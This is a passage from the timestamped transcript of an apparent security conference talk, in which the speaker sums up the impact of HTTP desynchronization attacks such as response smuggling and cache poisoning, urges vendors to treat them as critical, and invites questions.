43:45 - Also, using response smuggling will allow an attacker to hijack both requests and responses, in all cases, fully compromising the confidentiality of the application.
43:58 - Next, using nested injections and arbitrary cache poisoning, it will be possible to (indistinct) users taking valid responses from the web application, either by affecting the resources of the server, or by storing malicious payloads that replace valid endpoints.
44:18 - What’s more, response concatenation and splitting, as well as classic request smuggling, can be used to modify or control the request or response queue of a persistent connection.
44:28 - This completely compromises the integrity of the connection queue, and the web application itself.
44:45 - And finally, with a detailed analysis of the transmission and processing times, it is possible to increase the reliability of the attack and obtain these results with only a few malicious requests.
44:59 - So all this should be enough for vendors to once and for all understand that a desynchronization vulnerability, just by itself, should be seen as one of the most critical web vulnerabilities that a system can have.
45:16 - Now, I will answer any questions that you might have, and you can also send me any question or doubt that you have, or if you would like to talk about the subject, you can do it through my email or through my Twitter account.
45:30 - Thank you.